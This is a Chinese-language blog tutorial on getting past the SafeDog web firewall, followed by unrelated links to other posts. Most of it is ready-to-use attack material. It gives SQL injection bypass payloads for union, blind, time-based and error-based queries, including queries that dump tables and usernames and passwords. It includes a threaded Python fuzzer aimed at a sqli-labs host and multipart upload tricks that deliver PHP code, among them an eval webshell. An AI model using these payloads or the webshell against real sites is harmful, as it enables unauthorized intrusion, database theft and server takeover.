bypass_safedog
1、SQL注入
手工bypass要点 先通过破坏关键字测试出拦截规则 之后进行针对性绕过
1、Mysql
1.1、联合注入
0x01 and绕过
直接 and 1=1 直接就会被拦截
在数值的前面加特殊符号干扰匹配规则进行绕过
在这里使用 取反符号'-'或者取逻辑位非运算符号'~'进行绕过
+图片
mysql> select ~1;
+----------------------+
| ~1 |
+----------------------+
| 18446744073709551614 |
+----------------------+
1 row in set (0.00 sec)
mysql> select ~1=~1;
+-------+
| ~1=~1 |
+-------+
| 1 |
+-------+
1 row in set (0.00 sec)
mysql> select ~1=~2;
+-------+
| ~1=~2 |
+-------+
| 0 |
+-------+
0x02 对order by ——> 判断表的字段数 进行绕过
通过破坏关键字测试出 拦截的是 order by 这两个关键字的组合,单独的关键字不拦 我们只需要干扰他的匹配即可
在这里我测试使用的是内联注释 和中间加特殊字符进行绕过
/*!order*/ by 3
order%0a%a0by 4
+图片
0x03 union select 联合注入进行绕过
这两个也是单独一个不拦 组合起来就会触发拦截
这里给出几个绕过payload
union select 绕过
'+union/*!44944select*/+1,2,3--+
'+union --+1%0aselect 1,2,3--+
'+union %23%0a+all+select+1,2,3--+
/*&id=-1'+union+select+1,2,3--+*/
'+"/*" union select 1,2,3 "*/"--+
'+'/*' union select 1,2,3 %23*/--+
user() 函数绕过
hex(user%0a())
hex(user/**/())
爆表
union+/*!44944SELECT*/+1,2,GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%0a()
爆列
union+/*!44944SELECT*/+1,2,GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.columns+WHERE+TABLE_name=0x7573657273
爆数据
union+/*!44944SELECT*/+1,2,GROUP_CONCAT(username,0x7e,password+SEPARATOR+0x3c62723e)+FROM+users
1.2、盲注
1.2.1、延时注入
基础语句
select * from users where user_id=1 and if((substr((select user()),1,1)>10),sleep(5),1);
select user()处可以替换成要执行的查询语句
如:select group_concat(table_name,0x7e) from information_schema.tables where table_schema = database()
payload
1、内联注释绕过
/*!11443and*/ if((substr((select hex(user/**/())),1,1) > 1),sleep/**/(5),1)
2、and后面可以接特殊的字符可以绕过包括不限于! ~ & -
加偶数个'~',可以绕过
加奇数个'-'可以绕过'
加 3 4 7 8 等数个'!'绕过
and ~if((substr((select hex(user/**/())),1,1) > 1),sleep/**/(5),1)
and !!!if((substr((select hex(user/**/())),1,1) > 1),sleep/**/(5),1)
and ---if((substr((select hex(user/**/())),1,1) > 1),sleep/**/(5),1)
mysql> select * from users where user_id = 1 and !1;
Empty set (0.00 sec)
mysql> select * from users where user_id = 1 and !!1;
Empty set (0.00 sec)
mysql> select * from users where user_id = 1 and !!!1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id = 1 and !!!!1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id = 1 and !!!!!1;
Empty set (0.00 sec)
mysql> select * from users where user_id = 1 and ~1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id = 1 and ~~~~~~~~~~~~~~~~~~~~~1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id = 1 and -1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id = 1 and --1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id = 1 and ---1;
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)
1.2.2、布尔注入
基础语句
mysql> select * from users where user_id = 1 and substr((select user()),1,1)='r';
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| user_id | first_name | last_name | user | password | avatar | last_login | failed_login |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
| 1 | admin | admin | admin | 21232f297a57a5a743894a0e4a801fc3 | /hackable/users/admin.jpg | 2019-01-19 17:42:50 | 0 |
+---------+------------+-----------+-------+----------------------------------+---------------------------+---------------------+--------------+
1 row in set (0.00 sec)
mysql> select * from users where user_id = 1 and substr((select user()),1,1)='o';
Empty set (0.00 sec)
1、内联注释直接绕过
/*!11440and*/ substr((select hex(user/**/())),1,1)>1
2、在substr函数前面加特殊符号绕过
加偶数个'~',可以绕过
加 3 4 7 8 等数个'!'绕过
爆表
and+~~hex(substr((select table_name /*!11440from*/ information_schema.tables where table_schema=database/**/() limit 1,1),1,1))>71
1.3、报错注入
报错注入常用的一些函数
1、floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2、extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3、updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
mysql> select * from users where user_id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'
mysql> select * from users where user_id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
mysql> select * from users where user_id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
绕过payload
1、内联注释绕过
/*!%26%26*/ /*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)
/*!11440and*/ /*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)
2、特殊连接符绕过
任意数个'~'符号绕过
奇数个'-'绕过
and-/*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)
and~/*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)
and `updatexml`(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)
fuzz script
import requests
from queue import Queue
import threading
fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00']
fuzz_sz = ['', ' ']
fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"]
fuzz = fuzz_ch + fuzz_sz + fuzz_zs
class Fuzz:
def __init__(self, base_url, thread_num):
self.base_url = base_url
self.thread_num = thread_num
self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/74.0.3729.169 Safari/537.36'}
self.task = Queue()
for a in fuzz:
for b in fuzz:
for c in fuzz:
for d in fuzz:
exp = self.base_url + "'+\"/*\"union" + a + b + c + d + "select 1,2,3%23*/"
self.task.put(exp)
def visit(self, exp_url):
try:
resp = requests.get(exp_url, headers=self.headers)
resp_text = resp.text
except requests.ConnectionError:
resp_text = ""
return resp_text
def test_url(self):
with open('fuzz_url.txt', 'w+') as f:
while not self.task.empty():
exp_url = self.task.get()
resp_text = self.visit(exp_url)
if "Welcome" in resp_text and "error" not in resp_text:
f.write(exp_url + '\n')
print(exp_url)
def work(self):
threads = []
for i in range(self.thread_num):
t = threading.Thread(target=self.test_url())
threads.append(t)
t.start()
for t in threads:
t.join()
url = "http://192.168.121.11/sqlilabs/Less-1/?id=1"
obj = Fuzz(url, 10)
obj.work()
2、上传绕过
2.1 上传绕过
1、换行绕过
Content-Disposition: form-data; name="upload_file"; filename="adm.p
hp"
Content-Type: image/jpeg
<?php phpinfo();?>
2、00截断
Content-Disposition: form-data; name="upload_file"; filename="adm.php%00" # %00进行URL编码
Content-Type: image/jpeg
<?php phpinfo();?>
3、==绕过
Content-Disposition: form-data; name="upload_file"; filename=="adm.php"
Content-Type: image/jpeg
<?php phpinfo();?>
4、form-data后添加大量个字符进行绕过
Content-Disposition: form-dataoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo;oooooooo name="upload_file"; filename="adm.php"
Content-Type: image/jpeg
<?php phpinfo();?>
生成字符
with open('1.txt', 'w+') as f:
for i in range(411):
f.write('o')
5、文件名+'号绕过
Content-Disposition: form-data; name=upload_file; filename=ad'm.php
Content-Type: image/jpeg
<?php @eval($_POST[1])?>
6、文件名加;号绕过
Content-Disposition: form-data; name="upload_file"; filename="adm;.php"
Content-Type:image/jpeg
<?php include "adm.txt"; ?>
2.2 执行绕过
1、文件包含绕过
1.1、先上传个一句话txt格式的一句话
1.2、再传个脚本文件内容为包含前面传的文本文件
bypass_safedog的更多相关文章
随机推荐
- java命令-jstat/ javap
jstat命令对应用程序资源和性能进行实时监控 常用参数列举如下: 1. jstat -class pid 显示加载class的数量.所占空间.所耗时间等信息 2.jstat -compiler pi ...
- MS Word2016加载EndnoteX6插件
我的软件环境是:Win10 x64.MS Office 2016 x64.Endnote X6 32位. 在安装完MSO和Endnote后,Word中未能自动加载Endnote插件.现将启用方法记录如 ...
- mysql内连接(inner join 找两个表的交集)、左连接(left join 交集并且左表所有)、右连接(right join 交集并且右表所有)、全连接(mysql不支持)
用两个表(a_table.b_table),关联字段a_table.a_id和b_table.b_id来演示一下MySQL的内连接.外连接( 左(外)连接.右(外)连接.全(外)连接). MySQL版 ...
- 阿里云HBase推出普惠性高可用服务,独家支持用户的自建、混合云环境集群
HBase可以支持百TB数据规模.数百万QPS压力下的毫秒响应,适用于大数据背景下的风控和推荐等在线场景.阿里云HBase服务了多家金融.广告.媒体类业务中的风控和推荐,持续的在高可用.低延迟.低成本 ...
- 硬币问题 (dp,多重背包的二分优化)
题目描述 给你n种硬币,知道每种的面值Ai和每种的数量Ci.问能凑出多少种不大于m的面值. 输入 有多组数据,每一组第一行有两个整数 n(1≤n≤100)和m(m≤100000),第二行有2n个整数, ...
- 【Flutter学习】页面布局之宽高尺寸处理
一,概述 Flutter中拥有30多种预定义的布局widget,常用的有Container.Padding.Center.Flex.Row.Colum.ListView.GridView.按照< ...
- VMware Hyper-V不兼容
VMware Workstation Windows系統的Hyper-V不相容 禁用Device Guard或Credential Guard 1. 以管理員身份運行Windows Powershel ...
- 20175203 2018-2019-2《Java程序设计》第四周学习总结
## 教材学习内容总结 第五章内容知识点总结: 子类父类的定义格式: class 子类名 extends 父类名 { } 定义子类时用extends Object类是所有类的祖先类,即最原始类. 子类 ...
- Java中深度克隆和浅度克隆
一:使用目的: 就是为了快速构造一个和已有对象相同的副本.如果需要克隆对象,一般需要先创建一个对象,然后将原对象中的数据导入到新创建的对象中去,而不用根据已有对象进行手动赋值操作. 二:Object中 ...
- 【LCT维护子树信息】uoj207 共价大爷游长沙
这道题思路方面就不多讲了,主要是通过这题学一下lct维护子树信息. lct某节点u的子树信息由其重链的一棵splay上信息和若干轻儿子子树信息合并而成. splay是有子树结构的,可以在rotate, ...